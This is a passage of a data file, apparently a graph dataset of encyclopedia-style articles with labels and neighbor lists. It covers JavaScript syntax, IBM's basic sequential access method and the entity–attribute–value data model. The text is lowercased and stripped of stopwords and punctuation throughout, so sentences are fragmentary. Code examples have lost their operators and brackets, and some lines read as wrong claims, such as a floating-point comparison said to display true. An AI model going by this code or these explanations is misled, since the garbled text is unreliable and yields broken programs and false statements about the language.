semicolon suggest instead use leading semicolons lines starting nowiki /nowiki line accidentally joined previous one known defensive semicolon particularly recommended code may otherwise become ambiguous rearranged example b c // treated // b c // e .foo initial semicolons also sometimes used start javascript libraries case appended another library omits trailing semicolon result ambiguity initial statement five restricted productions return throw break continue post-increment/decrement cases inserting semicolons fix problem makes parsed syntax clear making error easier detect return throw take optional value break continue take optional label cases advice keep value label line statement often shows return statement one might return large object literal might accidentally placed starting new line post-increment/decrement potential ambiguity pre-increment/decrement recommended simply keep line return b // returns undefined treated // return // b // written // return b comment syntax c++ many languages // short one-line comment /* long multi-line comment /* comments /* may nested */ syntax error */ variables standard javascript type attached value stored variable starting es6 version language finalised 2015 variables declared codice_1 block level variable codice_2 function level variable codice_3 immutable one however object assigned codice_3 changed properties es6 variables declared codice_2 statement identifier must start letter underscore dollar sign subsequent characters also digits 0-9 javascript case sensitive letters include characters z uppercase characters z lowercase starting javascript 1.5 iso 8859-1 unicode letters \\uxxxx unicode escape sequences used identifiers certain javascript implementations sign used identifier contrary specifications supported newer implementations variables lexically scoped function level block level c depend order forward declaration necessary variable declared inside function point block inside function name resolve variable equivalent block scoping variables forward declared top function referred however variable value codice_6 initialized forward reference possible thus statement middle function equivalent declaration statement top function assignment statement point middle function – declaration hoisted assignment function statements whose effect declare variable type codice_7 assign value similar variable statements addition hoisting declaration also hoist assignment – entire statement appeared top containing function – thus forward reference also possible location function statement within enclosing function irrelevant sure understand var func function .. // hoisted function func .. // hoisted block scoping produced wrapping entire block function executing — known immediately-invoked function expression pattern declaring variable using codice_1 keyword variables declared outside function global variable declared higher scope accessed child functions javascript tries resolve identifier looks local function scope identifier found looks outer function declared local one along scope chain reaches global scope global variables reside still found javascript raise codice_9 exception assigning identifier javascript goes exactly process retrieve identifier except found global scope create variable property global object consequence variable never declared global assigned declaring variable keyword codice_2 global code i.e outside function body assigning never declared identifier adding property global object usually window also create new global variable note javascript strict mode forbids assignment undeclared variable avoids global namespace pollution also codice_3 declared without initialization examples variable declarations scope var x 0 // global variable function function f f console.log z // line raise referenceerror exception value z longer available let i=0 10 i++ console.log console.log // throws referenceerror defined const i=0 10 i++ console.log // throws typeerror assignment constant variable const pi // throws syntaxerror missing initializer const declaration javascript language provides six primitive data types primitive data types also provide set named values represent extents type boundaries named values described within appropriate sections value undefined assigned uninitialized variables also returned checking object properties exist boolean context undefined value considered false value note undefined considered genuine primitive type unless explicitly converted undefined value may behave unexpectedly comparison types evaluate false logical context var test // variable declared defined ... var testobj console.log test // test variable exists value ... console.log testobj.myprop // testobj exists property ... console.log undefined == null // unenforced type check displays true console.log undefined === null // enforce type check displays false note built-in language literal undefined thus foolproof way check whether variable undefined versions ecmascript 5 legal someone write robust approach compare using functions like wo n't work expected function isundefined x var u return x === u // like ... function isundefined x return x === void 0 // ... second one function isundefined x return typeof x === undefined // ... third one calling codice_12 raises unknown identifier whereas n't unlike undefined null often set indicate something declared defined empty boolean context value null considered false value javascript note null true primitive-type within javascript language note case single value performing checks enforce type checking null value equal false types surprisingly considered object console.log null == undefined // unenforced type check displays true console.log null === undefined // enforce type check displays false console.log typeof null === 'object // true numbers represented binary ieee-754 doubles provides accuracy nearly 16 significant digits floating point numbers always exactly represent real numbers including fractions becomes issue comparing formatting numbers example console.log 0.2 0.1 == 0.3 // displays true per ecmascript 6 specifications console.log 0.94 0.01 // displays 0.9299999999999999 result routine method used round numbers whenever formatted output numbers may specified notations 345 // integer although one numeric type javascript 34.5 // floating-point number 3.45e2 // another floating-point equivalent 345 0b1011 // binary integer equal 11 0o377 // octal integer equal 255 0xff // hexadecimal integer equal 255 digits represented ... extents +∞ −∞ nan number number type may obtained two program expressions infinity // positive infinity negative obtained -infinity instance nan // not-a-number value also returned failure ... infinity nan numbers typeof infinity // returns number typeof nan // returns number three special values correspond behave ieee-754 describes number constructor unary may used perform explicit numeric conversion var mystring 123.456 var mynumber1 number mystring var mynumber2 +mystring used constructor numeric wrapper object created though little use mynumericwrapper new number 123.456 however impossible use equality operators codice_13 codice_14 determine whether value nan console.log nan == nan // false console.log nan === nan // false console.log isnan nan // true string javascript sequence characters javascript strings created directly literals placing series characters double single quotes strings must written single line may include escaped newline characters \\n javascript standard allows backquote character a.k.a grave accent backtick quote multiline literal strings supported certain browsers 2016 firefox chrome internet explorer 11. var greeting hello world var anothergreeting 'greetings people earth individual characters within string accessed using method provided preferred way accessing individual characters within string also works non-modern browsers var h greeting.charat 0 modern browsers individual characters within string accessed strings single character notation arrays var h greeting 0 however javascript strings immutable greeting 0 h // fails applying equality operator == two strings returns true strings contents means length containing sequence characters case significant alphabets thus var x world var compare1 hello +x == hello world // compare1 contains true var compare2 hello +x == hello world // compare2 contains ... quotes type nested unless escaped var x hello world said // fine var x hello world said // good var x hello world said // works escaping possible create string using constructor var greeting new string hello world objects method returning primitive string wrapped within var new string hello typeof // 'object typeof s.valueof // 'string equality two objects behave string primitives var s1 new string hello var s2 new string hello s1 == s2 // false two distinct objects s1.valueof == s2.valueof // true javascript provides boolean data type literals operator returns string primitive types used logical context empty string evaluate due automatic type coercion values complement previous list evaluate including strings object automatic type coercion equality comparison operators codice_13 codice_16 avoided using type checked comparison operators codice_14 codice_18 type conversion required javascript converts operands follows douglas crockford advocates terms truthy falsy describe values various types behave evaluated logical context especially regard edge cases binary logical operators returned boolean value early versions javascript return one operands instead left–operand returned evaluated case conjunction codice_19 case disjunction codice_20 otherwise right–operand returned automatic type coercion comparison operators may differ cases mixed boolean number-compatible operands including strings evaluated number objects evaluated string boolean operand compared numeric value may unexpected expression explicitly cast boolean primitive doubling logical negation operator using function using conditional operator codice_21 // automatic type coercion console.log true == 2 // false ... true → 1 == 2 ← 2 console.log false == 2 // false ... false → 0 == 2 ← 2 console.log true == 1 // true ... true → 1 === 1 ← 1 console.log false == 0 // true ... false → 0 === 0 ← 0 console.log true == 2 // false ... true → 1 == 2 ← 2 console.log false == 2 // false ... false → 0 == 2 ← 2 console.log true == 1 // true ... true → 1 === 1 ← 1 console.log false == 0 // true ... false → 0 === 0 ← 0 console.log false == // true ... false → 0 === 0 ← console.log false == nan // false ... false → 0 == nan console.log nan == nan // false ... nan equivalent anything including nan // type checked comparison conversion types values console.log true === 1 // false ... data types match // explicit type coercion console.log true === 2 // true ... data types values match console.log true === 0 // false ... data types match values differ console.log 1 true false // true ... ±0 nan “ falsy ” numbers console.log 0 true false // true ... empty string “ falsy ” console.log boolean // true ... objects “ truthy ” new operator used create object wrapper boolean primitive however operator return object wrapper returns objects evaluate method must used retrieve wrapped value explicit coercion boolean type mozilla recommends function without used preference boolean object var boolean b // boolean true var f boolean b.valueof // boolean false var n new boolean b // recommended n new boolean b.valueof // preferred 0 || -0 || || null || undefined || b.valueof || new boolean || else b typeof b === object b.tostring === false new ecmascript6 symbol unique immutable identifier example x=symbol 1 y=symbol 1 x==y // false arr= x arr x =1 arr =2 // x unique keys array arr arr x // displays 1 arr // displays 2 x=symbol 3 arr // displays symbol 1 symbol 1 arr x // undefined x=symbol 1 arr x // undefined symbol wrapper also provides access variable free iterator x= 1,2,3,4 // x array iterable ex=x symbol.iterator // provides iterator x exv=ex.next .value =undefined console.log exv // displays 1,2,3,4 javascript language provides handful native objects javascript native objects considered part javascript specification javascript environment notwithstanding set objects always available array javascript object prototyped array constructor specifically designed store data values indexed integer keys arrays unlike basic object type prototyped methods properties aid programmer routine tasks example join slice push arrays use zero-based indexing scheme value inserted empty array means push method occupies 0th index array var myarray // point variable myarray newly ... myarray.push hello world // fill next empty index case 0 console.log myarray 0 // equivalent console.log hello world arrays length property guaranteed always larger largest integer index used array automatically updated one creates property even larger index writing smaller number length property remove larger indices elements arrays may accessed using normal object property access notation myarray 1 // 2nd item myarray myarray 1 two equivalent possible use dot -notation strings alternative representations number myarray.1 // syntax error myarray 01 // myarray 1 declaration array use either array literal array constructor myarray 0 1 4 5 // array length 6 6 elements ... myarray new array 0 1 2 3 4 5 // array length 6 6 elements myarray new array 365 // empty array length 365 arrays implemented defined elements use memory sparse arrays setting uses space two elements like object length array still reported 58 one use object declaration literal create objects behave much like associative arrays languages dog color brown size large dog color // results brown dog.color // also results brown one use object array declaration literals quickly create arrays associative multidimensional technically javascript support multidimensional arrays one mimic arrays-of-arrays cats color brown size large cats 0 size // results large dogs rover color brown size large dogs spot size // results small dogs.rover.color // results brown date object stores signed millisecond count zero representing 1970-01-01 00:00:00 ut range ±10 days several ways providing arguments date constructor note months zero-based new date // create new date instance representing current time/date new date 2010 2 1 // create new date instance representing 2010-mar-01 00:00:00 new date 2010 2 1 14 25 30 // create new date instance representing 2010-mar-01 14:25:30 new date 2010-3-1 14:25:30 // create new date instance string methods extract fields provided well useful tostring var new date 2010 2 1 14 25 30 // 2010-mar-01 14:25:30 // displays '2010-3-1 14:25:30 console.log d.getfullyear '- d.getmonth 1 '- d.getdate // built-in tostring returns something like 'mon mar 01 2010 14:25:30 gmt-0500 est console.log custom error messages created using error class throw new error something went wrong caught try ... catch ... finally blocks described section exception handling math object contains various math-related constants example functions example cosine note math object constructor unlike array date methods static class methods trigonometric functions use angles expressed radians degrees grads /expression/.test string // returns boolean string .search /expression/ // returns position number string .replace /expression/ replacement // examples /tom/.test name tom console.log hello tom console.log name tom .search /tom/ // == 11 letters tom console.log name tom .replace /tom/ john // == name john // \\d digit // \\d non digit // \\s space // \\s non space // \\w word char // \\w non word // one // one // range /\\d/.test 0 console.log 'digit 0-9 /.test 6 console.log 'digit 13579 /.test 1 console.log 'odd number /\\s\\s\\s\\s\\s\\s\\s/.test 'my name console.log 'format ok /\\w\\w\\w/.test 'tom console.log 'hello tom a-za-z /.test b console.log 'letter // ... z ... z 0 ... 9 alphanumeric // \\u0000 ... \\uffff unicode hexadecimal // \\x00 ... \\xff ascii hexadecimal // \\t tab // \\n new line // \\r cr // character // /t.m/.test 'tom console.log 'hi tom tam tim /a|b/.test console.log b // 0 1 match // 0 // 1 // n exactly n // n n // 0 n n less // n range n /ab c/.test ac console.log ok // match ac abc /ab*c/.test ac console.log ok // match ac abc abbc abbbc etc /ab+c/.test abc console.log ok // match abc abbc abbbc etc /ab 3 c/.test abbbc console.log ok // match abbbc /ab 3 c/.test abbbc console.log ok // match abbbc abbbbc abbbbbc etc /ab 1,3 c/.test abc console.log ok // match abc abbc abbbc // string starts // string ends /^my/.test name tom console.log hi /tom /.test name tom console.log hi tom // groups characters /water mark /.test watermark console.log water // match water watermark tom john /.test john console.log hi tom john // /g global // /i ignore upper/lower case // /m allow matches span multiple lines console.log hi tom .replace /tom/i john // == hi john console.log ratatam .replace /ta/ tu // == ratutam console.log ratatam .replace /ta/g tu // == ratutum my_array my_string.split my_delimiter // example my_array dog cat cow .split // my_array== dog cat cow my_array my_string.match my_expression // example my_array start 11:30 12:15 16:45 .match /\\d\\d \\d\\d/g // my_array== 11:30 12:15 16:45 var myre \\d 4 -\\d 2 -\\d 2 \\d 2 \\d 2 \\d 2 var results myre.exec date time 2009-09-08 09:37:08 results else console.log find valid date every function javascript instance function constructor // x argument 'return x function body last argument list var add new function x 'return x var add 1 2 console.log // 3 add function may also defined using function expression var add function x var add 1 2 console.log // 3 exists shorthand assigning function expression variable follows function add x var add 1 2 console.log // 3 var add x // var add x x var add 1 2 console.log // 3 function instance properties methods function subtract x console.log subtract.length // 2 expected amount arguments console.log subtract.tostring function subtract x '+ operator overloaded used string concatenation arithmetic addition may cause problems inadvertently mixing strings numbers unary operator convert numeric string number // concatenate 2 strings console.log 'he 'llo // displays hello // add two numbers console.log 2 6 // displays 8 // adding number string results concatenation console.log 2 2 // displays 22 console.log 3 4 // displays 34 7 may expected console.log 3 4 // displays 7 console.log 3 4 7 // displays 77 numbers stay numbers string added // convert string number console.log 2 === 2 // displays true console.log +'hello // displays nan similarly '* operator overloaded convert string number console.log 2 6'*1 // displays 8 console.log 3* 7 // 21 console.log 3'* 7 // 21 console.log 'hello'*'world // displays nan javascript supports following binary arithmetic operators javascript supports following unary arithmetic operators var x 1 console.log ++x // x becomes 2 displays 2 console.log x++ // displays 2 x becomes 3 console.log x // x 3 displays 3 console.log x -- // displays 3 x becomes 2 console.log x // displays 2 x 2 console.log -- x // x becomes 1 displays 1 modulo operator displays remainder division modulus negative numbers involved returned value depends operand var x 17 console.log x 5 // displays 2 console.log x 6 // displays 5 console.log -x 5 // displays -2 console.log -x -5 // displays -2 console.log x -5 // displays 2 always return non-negative number re-add modulus apply modulo operator var x 17 console.log -x 5+5 5 // displays 3 assignment primitive types var x 9 x += 1 console.log x // displays 10 x *= 30 console.log x // displays 300 x /= 6 console.log x // displays 50 x -= 3 console.log x // displays 47 x 7 console.log x // displays 5 assignment object types /** var object_1 1 // assign reference newly created object object_1 var object_2 0 var object_3 object_2 // object_3 references object object_2 object_3.a 2 message // displays 1 2 2 object_2 object_1 // object_2 references object object_1 message // displays 1 1 2 object_2.a 7 // modifies object_1 message // displays 7 7 2 object_3.a 5 // object_3 n't change object_2 message // displays 7 7 5 object_3 object_2 object_3.a=4 // object_3 changes object_1 object_2 message // displays 4 4 4 function message mozilla javascript since version 1.7 destructuring assignment allows assignment parts data structures several variables left hand side assignment pattern resembles arbitrarily nested object/array literal containing l-lvalues leaves receive substructures assigned value var b c e b c 3 4 5 console.log b c // displays 3,4,5 e foo 5 bar 6 baz 'baz 'content var arr baz arr 0 arr 3 foo bar b e console.log b arr // displays 5,6 baz ,content b b // swap contents b console.log b // displays 6,5 b c 3 4 5 // permutations b c b c console.log b c // displays 4,5,3 ecmascript 2015 standard introduces ... operator related concepts spread syntax rest parameters spread syntax provides another way destructure arrays indicates elements specified array used parameters function call items array literal words ... transforms ... foo foo 0 foo 1 foo 2 this.bar ... foo this.bar foo 0 foo 1 foo 2 var 1 2 3 4 // used multiple times expression var b ... ... // b 1 2 3 4 1 2 3 4 // combined non-spread items var c 5 6 ... 7 9 // c 5 6 1 2 3 4 7 9 // comparison without spread operator // creates nested array var // 1 2 3 4 1 2 3 4 // works function calls function foo arg1 arg2 arg3 // use even passes parameters function use foo ... // 1:2:3 → foo 0 1 2 3 // mix non-spread parameters foo 5 ... 6 // 5:1:2 → foo 5 0 1 2 3 6 // comparison without spread operator // assigns array arg1 nothing parameters foo // 1,2,3,4 undefined undefined ... used function declaration indicates rest parameter rest parameter must final named parameter function parameter list assigned array containing arguments passed function excess named parameters words gets rest arguments passed function hence name function foo b ... c foo 1 2 3 4 5 // 3 → c 3 4 5 foo b // 0 → c rest parameters similar javascript arguments object array-like object contains parameters named unnamed current function call unlike arguments however rest parameters true array objects methods .slice .sort used directly ... operator used array objects however proposal extend objects future ecmascript standard variables referencing objects equal identical reference object var obj1 1 var obj2 1 var obj3 obj1 console.log obj1 == obj2 //false console.log obj3 == obj1 //true console.log obj3 === obj1 //true see also string javascript provides four logical operators context logical operation expression evaluates true except following boolean function used explicitly convert primitive type boolean // empty strings return false console.log boolean === false console.log boolean false === true console.log boolean 0 === true // zero nan return false console.log boolean nan === false console.log boolean 0 === false console.log boolean -0 === false // equivalent -1*0 console.log boolean -2 === true // objects return true console.log boolean === true console.log boolean === true console.log boolean === true // types return false console.log boolean null === false console.log boolean undefined === false // equivalent boolean operator evaluates operand boolean returns negation using operator twice row double negative explicitly converts expression primitive type boolean console.log 0 === boolean 0 console.log boolean 0 === 1 console.log 1 === boolean 1 console.log 0 === boolean 0 console.log boolean 0 === 1 console.log 1 === boolean 1 console.log === boolean console.log boolean === console.log === boolean console.log === boolean console.log boolean === console.log === boolean ternary operator also used explicit conversion console.log == false console.log true false // “ truthy ” comparison uses .tostring console.log 0 == false console.log 0 true false // 0 .tostring == 0 console.log 0 == false console.log 0 true false // 0 → 0 ... 0 == 0 ... 0 ← false console.log 1 == true console.log 1 true false // 1 .tostring == 1 console.log 1 == true console.log 1 true false // 1 → 1 ... 1 == 1 ... 1 ← true console.log 2 true console.log 2 true false // 2 .tostring == 2 console.log 2 true console.log 2 true false // 2 → 2 ... 2 1 ... 1 ← true expressions use features post–incrementation i++ anticipated side effect javascript provides short-circuit evaluation expressions right operand executed left operand suffice determine value expression console.log || b // true reason evaluate b. console.log b // false reason evaluate b. console.log c f // c true reason evaluate f. early versions javascript jscript binary logical operators returned boolean value like c-derived programming languages however contemporary implementations return one operands instead console.log || b // true return otherwise return b console.log b // false return otherwise return b programmers familiar behavior c might find feature surprising allows concise expression patterns like null coalescing var || default // assigns default value null empty etc javascript supports following binary bitwise operators examples x=11 6 console.log x // 2 javascript supports following unary bitwise operator javascript supports following binary assignment operators examples x=7 console.log x // 7 x « =3 console.log x // 7- 14- 28- 56 examples str ab cd // abcd str += e // abcde str2 2 2 // 22 4 4 pair curly brackets enclosed sequence statements constitute compound statement used wherever statement used expr else expr2 else conditional operator creates expression evaluates one two expressions depending condition similar statement selects one two statements execute depending condition i.e. conditional operator expressions statements unlike statement conditional operator omit else-branch syntax javascript switch statement follows syntax javascript loop follows syntax javascript codice_22 follows var property_name some_object syntax javascript loop follows condition syntax javascript codice_24 follows condition statement adds given object properties methods following block scope letting referenced local variables document semantics similar statement pascal availability statements hinders program performance believed reduce code clarity since given variable could actually property enclosing statement allowed strict mode javascript supports nested labels implementations loops blocks labelled break statement loops continue although goto reserved word goto implemented javascript loop1 var 0 10 a++ block1 goto block1 // parse error function block possibly empty parameter list normally given name function may use local variables exit function without return statement value returned function gcd segmenta segmentb console.log gcd 60 40 // 20 var mygcd gcd // mygcd reference function gcd note argument s. console.log mygcd 60 40 // 20 functions first class objects may assigned variables number arguments given calling function may necessarily correspond number arguments function definition named argument definition matching argument call value implicitly cast false within function arguments may also accessed object provides access arguments using indices e.g including beyond number named arguments arguments list .length property instance methods etc function add7 x add7 3 // 11 add7 3 4 // 9 primitive values number boolean string passed value objects reference object passed var obj1 1 var obj2 b 2 function foo p foo obj1 3 // affect obj1 3 additional parameter console.log obj1.a obj2.b // writes 1 3 functions declared inside functions access outer function local variables furthermore implement full closures remembering outer function local variables even outer function exited var v top var bar baz function foo foo baz fugly bar // fugly fud even though foo exited console.log v // top convenience types normally subdivided primitives objects objects entities identity equal map property names values slots prototype-based programming terminology objects may thought associative arrays hashes often implemented using data structures however objects additional features prototype chain ordinary associative arrays javascript several kinds built-in objects namely array boolean date function math number object regexp string objects host objects defined language runtime environment example browser typical host objects belong dom window form links etc. objects created using constructor object literal constructor use either built-in object function custom function convention constructor functions given name starts capital letter // constructor var anobject new object // object literal var objecta var objecta2 // a2 create new objects copies var objectb index1 'value 1 index2 'value 2 // custom constructor see object literals array literals allow one easily create flexible data structures var mystructure basis json simple notation uses javascript-like syntax data exchange method simply function assigned property name object unlike many object-oriented languages distinction function definition method definition object-related javascript rather distinction occurs function calling function called method called method standard local variable automatically set object instance left also methods set explicitly—some packages jquery unusual things example foo used constructor nothing special constructor plain function initialises object used keyword norm set newly created blank object note example foo simply assigning values slots functions thus assign different functions different instances prototyping example function foo yz var foo1 new foo 1 var foo2 new foo 0 foo2.prefix b- console.log foo1/2 foo1.pyz foo2.pyz // foo1/2 a-y b-z foo1.m3 px // assigns function evaluated result i.e px var baz prefix c- baz.m4 px // need constructor make object console.log m1/m3/m4 foo1.m1 foo1.m3 baz.m4 // m1/m3/m4 a-x a-x c-x foo1.m2 // throws exception foo1.m2 n't exist constructor functions simply assign values slots newly created object values may data functions example manipulating object function myobject attributea attributeb myobject.staticc blue // myobject function object console.log myobject.staticc // blue object new myobject 'red 1000 console.log object.attributea // red console.log object attributeb // 1000 console.log object.staticc // undefined object.attributec new date // add new property delete object.attributeb // remove property object console.log object.attributeb // undefined delete object // remove whole object rarely used console.log object.attributea // throws exception constructor referenced object prototype constructor slot // use 'new sets prototype slots example // x new foo would set x prototype foo.prototype // foo.prototype constructor slot pointing back foo x new foo // almost equivalent y.constructor foo y.constructor // except x.constructor == y.constructor // true x instanceof foo // true instanceof foo // false // prototype object.prototype // foo.prototype since initialised // instead new foo // even though foo set constructor slot // ignored instanceof prototype's // constructor slot considered functions objects used produce effect similar static properties using c++/java terminology shown function object also special prototype property discussed inheritance section object deletion rarely used scripting engine garbage collect objects longer referenced javascript supports inheritance hierarchies prototyping manner self following example class inherits class created reference base instance copied derive contain value retrieved accessed made clear changing value reflected value implementations allow prototype accessed set explicitly using slot shown function base function derived base new base derived.prototype base // must new derived derived.prototype.constructor derived // required make instanceof work new derived // copies derived.prototype instance hidden prototype slot instanceof derived // true instanceof base // true d.anoverride // derived :anoverride d.abasefunction // base :anewbasefunction console.log d.abasefunction == derived.prototype.abasefunction // true console.log d.__proto__ == base // true mozilla-based implementations false many others following shows clearly references prototypes copied instance creation changes prototype affect instances refer base.prototype.m m2 bar new base console.log bar.m bar.m // bar.m two new top foo new base base.prototype // effect foo *reference* copied console.log foo.m foo.m // foo.m two baz new base console.log baz.m baz.m // baz.m three t.m m1 // affect baz derived classes console.log baz.m1 baz.m // baz.m1 one practice many variations themes used powerful confusing javascript includes codice_25 exception handling statement handle run-time errors codice_25 statement catches exceptions resulting error throw statement syntax follows try catch errorvalue finally initially statements within try block execute exception thrown script control flow immediately transfers statements catch block exception available error argument otherwise catch block skipped catch block want handle specific error case statements finally block always executed used free resources although memory automatically garbage collected either catch finally clause may omitted catch argument required mozilla implementation allows multiple catch statements extension ecmascript standard follow syntax similar used java browser event commonly used trap exceptions onerror function errorvalue url linenr ... return true evaluates expression string parameter include assignment statements variables local functions referenced expression function foo // shows val 9",
    "neighbors": [
      1152,
      2304,
      5635,
      8068,
      3462,
      6791,
      8582,
      1802,
      6154,
      10510,
      9871,
      6160,
      8854,
      155,
      3229,
      8605,
      6176,
      1698,
      803,
      5031,
      5677,
      1203,
      5684,
      438,
      4920,
      1470,
      5311,
      2880,
      7871,
      963,
      5067,
      8524,
      10571,
      339,
      8531,
      7894,
      4056,
      9560,
      9561,
      603,
      8923,
      8414,
      482,
      9195,
      5101,
      10991,
      3313,
      10739,
      10744,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 8290,
    "label": 2,
    "text": "Basic_sequential_access_method:basic sequential access method ibm mainframe operating systems basic sequential access method bsam access method read write datasets sequentially bsam available os/360 os/vs2 mvs z/os related operating systems bsam used devices naturally sequential punched card readers punches line printers magnetic tape also used data devices could also addressed directly magnetic disks bsam offers device independence extent possible api calls used different devices bsam allows programs read write physical blocks data opposed powerful less flexible queued sequential access method qsam allows programs access logical records within physical blocks data bsam user must aware possibility encountering short truncated blocks blocks within dataset shorter blksize dataset particularly end dataset also many cases within dataset qsam none limitations programmer specifies codice_1 data control block dcb indicate use bsam basic access method bsam reads writes member data blocks i/o operation proceeds asynchronously must tested completion using codice_2 macro bsam uses standard system macros codice_3 codice_4 codice_5 codice_6 codice_2 codice_8 macro instruction returns position last block read written codice_9 macro reposition location identified previous codice_8 dataset unblocked logical record length lrecl equal physical block size blksize bsam may utilized simulate directly accessed dataset using codice_8 codice_9 supported direct access device type devd=da primitive applications designed way bsam application program interface compared interface offered open read write close calls using file handles operating systems unix windows codice_9 provides analog seek lseek ftell equivalent codice_8",
    "neighbors": [
      868,
      4645,
      7272,
      7881,
      2616,
      4586,
      8393,
      6797,
      7053,
      7983,
      8272,
      10094,
      10958,
      5492,
      3669,
      2168,
      11131
    ],
    "mask": "None"
  },
  {
    "node_id": 8291,
    "label": 1,
    "text": "Entity–attribute–value_model:entity–attribute–value model entity–attribute–value model eav data model encode space-efficient manner entities number attributes properties parameters used describe potentially vast number actually apply given entity relatively modest entities correspond mathematical notion sparse matrix eav also known object–attribute–value model vertical database model open schema data representation analogous space-efficient methods storing sparse matrix non-empty values stored eav data model attribute-value pair fact describing entity row eav table stores single fact eav tables often described long skinny long refers number rows skinny columns data recorded three columns consider one would try represent general-purpose clinical record relational database clearly creating table set tables thousands columns feasible vast majority columns would null complicate things longitudinal medical record follows patient time may multiple values parameter height weight child example change child grows finally universe clinical findings keeps growing example diseases emerge new lab tests devised would require constant addition columns constant revision user interface situation list attributes changes frequently termed attribute volatility database parlance following shows snapshot eav table clinical findings visit doctor fever morning 1/5/98 entries shown within angle brackets references entries tables shown text rather encoded foreign key values ease understanding example values literal values could also pre-defined value lists latter particularly useful possible values known limited i.e. enumerable example illustrates symptoms findings might seen patient pneumonia eav data described comparable contents supermarket sales receipt would reflected sales line items table database receipt lists details items actually purchased instead listing every product shop customer might purchased n't like clinical findings given patient sales receipt sparse row modeling facts something case sales transaction recorded multiple rows rather multiple columns standard data modeling technique differences row modeling eav may considered generalization row-modeling clinical data repository row modeling also finds numerous uses laboratory test subschema typically modeled way lab test results typically numeric encoded numerically circumstances would need go beyond standard row-modeling eav listed situation arises ontology-modeling environments categories classes must often created fly classes often eliminated subsequent cycles prototyping certain hybrid classes attributes non-sparse present instances attributes highly variable sparse latter suitable eav modeling example descriptions products made conglomerate corporation depend product category e.g. attributes necessary describe brand light bulb quite different required describe medical imaging device common attributes packaging unit per-item cost clinical data entity typically clinical event described general-purpose settings entity foreign key objects table records common information every object thing database – minimum preferred name brief description well category/class entity belongs every record object table assigned machine-generated object id objects table approach pioneered tom slezak colleagues lawrence livermore laboratories chromosome 19 database standard large bioinformatics databases use objects table mandate concurrent use eav design conventional tables used store category-specific details object major benefit central objects table supporting table object synonyms keywords one provide standard google-like search mechanism across entire system user find information object interest without first specify category belongs important bioscience systems keyword like acetylcholine could refer either molecule neurotransmitter biological receptor binds eav table attribute id foreign key attribute definitions table stated however usually multiple metadata tables contain attribute-related information discussed shortly coercing values strings eav data example results simple non-scalable structure constant data type inter-conversions required one wants anything values index value column eav table essentially useless also convenient store large binary data images base64 encoded form table small integers strings therefore larger systems use separate eav tables data type including binary large objects blobs metadata given attribute identifying eav table data stored approach actually quite efficient modest amount attribute metadata given class form user chooses work cached readily memory however requires moving data one table another attribute ’ data type changed happen often mistakes made metadata definition database schema design eav general-purpose means knowledge representation originated concept association lists attribute-value pairs commonly used today first introduced language lisp attribute-value pairs widely used diverse applications configuration files using simple syntax like attribute value example non-database use eav uima uniform information management architecture standard managed apache foundation employed areas natural language processing software analyses text typically marks annotates segment example provided uima tutorial program performs named-entity recognition ner document annotating text segment president bush annotation-attribute-value triple person full_name george w. bush annotations may stored database table eav direct connection av-pairs stead hammond appear first conceived use persistent storage arbitrarily complex data first medical record systems employ eav regenstrief electronic medical record effort led clement macdonald william stead ed hammond tmr medical record system help clinical data repository cdr created homer warner group lds hospital salt lake city utah regenstrief system actually used patient-attribute-timestamp-value design use timestamp supported retrieval values given patient/attribute chronological order systems developed 1970s released commercial systems based e.f. codd relational database model available though help much later ported relational architecture commercialized 3m corporation note codd landmark paper published 1970 heavily mathematical tone unfortunate effect diminishing accessibility among non-computer-science types consequently delaying model acceptance software-vendor circles value subsequent contribution christopher j date codd colleague ibm translating ideas accessible language accompanied simple examples illustrated power overestimated group columbia-presbyterian medical center first use relational database engine foundation eav system open-source trialdb clinical study data management system nadkarni et al first use multiple eav tables one dbms data type eav/cr framework designed primarily luis marenco prakash nadkarni overlaid principles object orientation onto eav built tom slezak object table approach described earlier entity section senselab publicly accessible neuroscience database built eav/cr framework additionally numerous commercial applications use aspects eav internally including oracle designer applied er modeling kalido applied data warehousing master data management lazysoft sentences applied custom software development eav system sit top tabular structure instead directly b tree infinitydb eliminates need one table per value data type term eav database refers database design significant proportion data modeled eav however even database described eav-based tables system traditional relational tables noted eav modeling makes sense categories data clinical findings attributes numerous sparse conditions hold standard relational modeling i.e. one column per attribute preferable using eav mean abandoning common sense principles good relational design clinical record systems subschemas dealing patient demographics billing typically modeled conventionally vendor database schemas proprietary vista system used throughout united states department veterans affairs va medical system known veterans health administration vha open-source schema readily inspectable though uses mumps database engine rather relational database discussed shortly eav database essentially unmaintainable without numerous supporting tables contain supporting metadata metadata tables typically outnumber eav tables factor least three typically standard relational tables example metadata table attribute definitions table mentioned simple eav design values attribute simple primitive data types far database engine concerned however eav systems used representation highly diverse data possible given object class instance may substructure attributes may represent kinds objects turn may substructure arbitrary level complexity car example engine transmission etc. engine components cylinders permissible substructure given class defined within system attribute metadata discussed later thus example attribute random-access-memory could apply class computer class engine represent substructure one incorporates special eav table value column contains references entities system i.e. foreign key values objects table get information given object requires recursive traversal metadata followed recursive traversal data stops every attribute retrieved simple atomic recursive traversal necessary whether details individual class represented conventional eav form traversal performed standard object–relational systems example practice number levels recursion tends relatively modest classes performance penalties due recursion modest especially indexing object ids eav/cr eav classes relationships refers framework supports complex substructure name somewhat misnomer outshoot work eav systems practice many even classes system may represented standard relational form based whether attributes sparse dense eav/cr really characterized detailed metadata rich enough support automatic generation browsing interfaces individual classes without write class-by-class user-interface code basis browser interfaces possible generate batch dynamic sql queries independent class object first consulting metadata using metadata information generate sequence queries data tables queries may arbitrarily recursive approach works well object-at-a-time queries web-based browsing interfaces clicking name object brings details object separate page metadata associated object class also facilitates presentation object details includes captions individual attributes order presented well grouped one approach eav/cr allow columns hold json structures thus provide needed class structure example postgresql version 9.4 offers json binary column jsonb support allowing json attributes queried indexed joined words prof. dr. daniel masys formerly chair vanderbilt university medical informatics department challenges working eav stem fact eav database physical schema way data stored radically different logical schema – way users many software applications statistics packages regard i.e. conventional rows columns individual classes eav table conceptually mixes apples oranges grapefruit chop suey want analysis data using standard off-the-shelf software cases convert subsets columnar form process called pivoting important enough discussed separately metadata helps perform sleight hand lets users interact system terms logical schema rather physical software continually consults metadata various operations data presentation interactive validation bulk data extraction ad hoc query metadata actually used customize behavior system eav systems trade simplicity physical logical structure data complexity metadata among things plays role database constraints referential integrity standard database designs tradeoff generally worthwhile typical mixed schema production systems data conventional relational tables also benefit functionality automatic interface generation structure metadata complex enough comprises subschema within database various foreign keys data tables refer tables within subschema subschema standard-relational features constraints referential integrity used hilt correctness metadata contents terms intended system behavior critical task ensuring correctness means creating eav system considerable design efforts must go building user interfaces metadata editing used people team know problem 